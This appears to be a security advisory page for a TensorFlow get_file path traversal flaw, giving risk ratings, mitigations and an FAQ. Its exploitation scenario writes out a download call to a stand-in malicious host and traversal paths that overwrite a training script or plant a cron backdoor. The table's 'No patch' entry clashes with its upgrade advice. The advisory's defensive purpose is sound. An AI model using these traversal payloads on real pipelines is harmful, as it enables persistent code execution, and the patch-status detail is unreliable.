CVE-2021-35958: TensorFlow: path traversal in get_file allows file overwrite
CRITICAL | PoC AVAILABLE
Any ML pipeline using tf.keras.utils.get_file with extract=True against external or user-controlled URLs is vulnerable to zip-slip attacks that overwrite arbitrary files on the host, potentially escalating to code execution. Audit all pipeline code for this pattern immediately and replace with validated extraction logic. Upgrade to TensorFlow 2.6+ and treat all remote archives as untrusted input regardless of source.
What is the risk?
Critical (CVSS 9.1). No authentication or user interaction is required: an attacker only needs to serve a malicious archive at a URL that the ML pipeline fetches. The file-overwrite primitive escalates readily to code execution when it targets Python scripts, config files, or model artifacts. ML training pipelines routinely download external datasets and pre-trained models at scale, which makes the attack surface broader than for typical application CVEs. The vendor's position that the function 'isn't meant for untrusted archives' does not reduce operational risk where pipelines consume third-party datasets.
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| TensorFlow | pip | ≤ 2.5.0 | No patch |
Do you use TensorFlow through 2.5.0 and call tf.keras.utils.get_file with extract=True on archives you do not control? You're affected.
What should I do?
1. Upgrade TensorFlow to 2.6.0 or later and review release notes for archive handling changes.
2. Audit all codebases for the pattern get_file(..., extract=True) combined with external or user-supplied URLs, and flag all instances for review.
3. Replace unsafe extraction with explicit archive member path validation: reject any member whose resolved path escapes the target directory. For Python tarfiles, use the 'data' filter (Python 3.12+) or manually check for absolute paths and '..' sequences in member names.
4. Run ML pipeline processes under least-privilege OS accounts with minimal write permissions to model and data directories.
5. Implement file integrity monitoring on model artifacts and training data directories.
6. For detection: scan IaC and pipeline code with semgrep rules targeting get_file.*extract and tarfile.extractall without path filtering.
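The member path validation described in the steps above can be sketched roughly as follows. This is a minimal illustration for tar archives only, not TensorFlow's or Keras's own code: `is_within_directory` and `safe_extract_tar` are hypothetical helper names, and rejecting every link or special member is an assumed policy that may be stricter than a given pipeline needs.

```python
import os
import tarfile


def is_within_directory(base_dir: str, candidate: str) -> bool:
    """Return True if candidate resolves to a path inside base_dir."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(candidate)
    return os.path.commonpath([base, target]) == base


def safe_extract_tar(archive_path: str, dest_dir: str) -> None:
    """Extract a tar archive, refusing members that escape dest_dir.

    Hypothetical helper for illustration; not part of TensorFlow or Keras.
    """
    os.makedirs(dest_dir, exist_ok=True)
    with tarfile.open(archive_path) as tar:
        # Validate every member before anything is written to disk.
        for member in tar.getmembers():
            # Links and device nodes can redirect later writes, so this
            # sketch rejects them outright (an assumed, strict policy).
            if not (member.isfile() or member.isdir()):
                raise ValueError(f"unsupported member type: {member.name!r}")
            # os.path.join discards dest_dir for absolute names, so absolute
            # paths and '..' sequences are both caught by the same check.
            joined = os.path.join(dest_dir, member.name)
            if not is_within_directory(dest_dir, joined):
                raise ValueError(f"member escapes target directory: {member.name!r}")
        if hasattr(tarfile, "data_filter"):
            # Interpreters that ship extraction filters get the 'data'
            # filter as a second layer of defence.
            tar.extractall(dest_dir, filter="data")
        else:
            tar.extractall(dest_dir)
```

A pipeline could download the archive without extract=True and then pass the cached file to a helper like this one, so that extraction only happens after every member name has been checked.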
Frequently Asked Questions
What is CVE-2021-35958?
CVE-2021-35958 is a path traversal vulnerability (CWE-22) in TensorFlow through 2.5.0. When tf.keras.utils.get_file is called with extract=True, a crafted archive can overwrite arbitrary files on the host, which can escalate to code execution.
Is CVE-2021-35958 actively exploited?
Proof-of-concept exploit code is publicly available for CVE-2021-35958, increasing the risk of exploitation.
How to fix CVE-2021-35958?
Upgrade TensorFlow to 2.6.0 or later, audit code for get_file(..., extract=True) on external or user-supplied URLs, and replace unsafe extraction with validated extraction that rejects members escaping the target directory. Then harden the environment: run pipelines under least-privilege accounts, monitor model and data directories for integrity, and scan pipeline code with semgrep. The six steps under "What should I do?" give the details.
What systems are affected by CVE-2021-35958?
This vulnerability affects the following AI/ML architecture patterns: training pipelines, data preprocessing pipelines, model loading and serving, CI/CD ML pipelines, notebook environments.
What is the CVSS score for CVE-2021-35958?
CVE-2021-35958 has a CVSS v3.1 base score of 9.1 (CRITICAL). The EPSS exploitation probability is 1.86%.
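The 9.1 base score can be reproduced from the vector listed under "CVSS Vector" (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H). The sketch below follows the published CVSS v3.1 base-score equations and metric weights; the function names are illustrative, and temporal and environmental metrics are deliberately left out.

```python
import math

# Metric weights from the CVSS v3.1 specification (base metrics only).
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "UI": {"N": 0.85, "R": 0.62},
    "C": {"H": 0.56, "L": 0.22, "N": 0.0},
    "I": {"H": 0.56, "L": 0.22, "N": 0.0},
    "A": {"H": 0.56, "L": 0.22, "N": 0.0},
}
# Privileges Required depends on whether scope is unchanged (U) or changed (C).
PR_WEIGHTS = {
    "U": {"N": 0.85, "L": 0.62, "H": 0.27},
    "C": {"N": 0.85, "L": 0.68, "H": 0.5},
}


def roundup(value: float) -> float:
    """Round up to one decimal place, as defined in the v3.1 specification."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(vector: str) -> float:
    """Compute the CVSS v3.1 base score for a vector string."""
    # Skip the leading "CVSS:3.1" prefix and map metric -> value.
    metrics = dict(item.split(":") for item in vector.split("/")[1:])
    scope = metrics["S"]
    iss = 1 - (
        (1 - WEIGHTS["C"][metrics["C"]])
        * (1 - WEIGHTS["I"][metrics["I"]])
        * (1 - WEIGHTS["A"][metrics["A"]])
    )
    if scope == "U":
        impact = 6.42 * iss
    else:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    exploitability = (
        8.22
        * WEIGHTS["AV"][metrics["AV"]]
        * WEIGHTS["AC"][metrics["AC"]]
        * PR_WEIGHTS[scope][metrics["PR"]]
        * WEIGHTS["UI"][metrics["UI"]]
    )
    if impact <= 0:
        return 0.0
    if scope == "U":
        return roundup(min(impact + exploitability, 10))
    return roundup(min(1.08 * (impact + exploitability), 10))


score = base_score("CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H")
```

For this vector the impact sub-score is about 5.18 and the exploitability sub-score about 3.89; their sum of roughly 9.06 rounds up to 9.1. Confidentiality is rated None, which is why the score stays below the 9.8 that the same vector would receive with C:H.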
What is the AI security impact?
MITRE ATLAS Techniques
- AML.T0010.001 AI Software
- AML.T0010.002 Data
- AML.T0011.001 Malicious Package
- AML.T0049 Exploit Public-Facing Application
What are the technical details?
Original Advisory
TensorFlow through 2.5.0 allows attackers to overwrite arbitrary files via a crafted archive when tf.keras.utils.get_file is used with extract=True. NOTE: the vendor's position is that tf.keras.utils.get_file is not intended for untrusted archives.
Exploitation Scenario
An adversary registers a lookalike domain mimicking a popular ML dataset repository, or compromises a legitimate one. They publish a malicious .tar.gz archive containing a crafted entry with a traversal path such as ../../app/train.py or ../../etc/cron.d/mlbackdoor. When the ML training pipeline executes tf.keras.utils.get_file('dataset.tar.gz', origin='https://malicious-host/dataset.tar.gz', extract=True), TensorFlow extracts the archive without validating member paths. The attacker's payload overwrites a training script or scheduled task, which executes during the next model run or system event. The result is persistent code execution on ML infrastructure with the pipeline's credentials and network access.
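To see why an unvalidated member name is enough, it helps to compute where a naive extractor would write it. The sketch below is purely lexical and uses posixpath so the result is the same on any platform; the extraction directory /home/ml/.keras/datasets is an assumed example, and `resolve_member` and `escapes` are hypothetical helper names. It ignores symlinks, so it illustrates the mechanism rather than serving as a complete check.

```python
import posixpath


def resolve_member(dest_dir: str, member_name: str) -> str:
    """Path a naive extractor would write to for member_name under dest_dir."""
    return posixpath.normpath(posixpath.join(dest_dir, member_name))


def escapes(dest_dir: str, member_name: str) -> bool:
    """True if the member would land outside dest_dir (lexical check only)."""
    base = posixpath.normpath(dest_dir)
    target = resolve_member(base, member_name)
    return not (target == base or target.startswith(base + "/"))


# Assumed extraction directory, for illustration only.
DEST = "/home/ml/.keras/datasets"

benign = resolve_member(DEST, "images/cat.png")
traversal = resolve_member(DEST, "../../app/train.py")
absolute = resolve_member(DEST, "/etc/cron.d/mlbackdoor")
```

Here the benign member stays under the extraction directory, while the traversal entry resolves to /home/ml/app/train.py and the absolute entry to /etc/cron.d/mlbackdoor. How many '..' segments an attacker needs depends on where the pipeline extracts, which is why the scenario's paths are examples rather than fixed values.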
Weaknesses (CWE)
CWE-22 — Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'): The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.
- [Implementation] Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
- [Architecture and Design] For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.
Source: MITRE CWE corpus.
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
References
- docs.python.org/3/library/tarfile.html 3rd Party
- github.com/tensorflow/tensorflow/blob/b8cad4c631096a34461ff8a07840d5f4d123ce32/tensorflow/python/keras/README.md 3rd Party
- github.com/tensorflow/tensorflow/blob/b8cad4c631096a34461ff8a07840d5f4d123ce32/tensorflow/python/keras/utils/data_utils.py 3rd Party
- keras.io/api/ 3rd Party
- vuln.ryotak.me/advisories/52 3rd Party
- github.com/miguelc49/CVE-2021-35958-1 Exploit
- github.com/miguelc49/CVE-2021-35958-2 Exploit
Related Vulnerabilities
- CVE-2020-15196 (CVSS 9.9): TensorFlow: heap OOB read in sparse/ragged count ops. Same package: tensorflow
- CVE-2020-15205 (CVSS 9.8): TensorFlow: heap overflow in StringNGrams, ASLR bypass. Same package: tensorflow
- CVE-2020-15208 (CVSS 9.8): TFLite: OOB read/write via tensor dimension mismatch. Same package: tensorflow
- CVE-2019-16778 (CVSS 9.8): TensorFlow: heap overflow in UnsortedSegmentSum op. Same package: tensorflow
- CVE-2022-23587 (CVSS 9.8): TensorFlow: integer overflow in Grappler enables RCE. Same package: tensorflow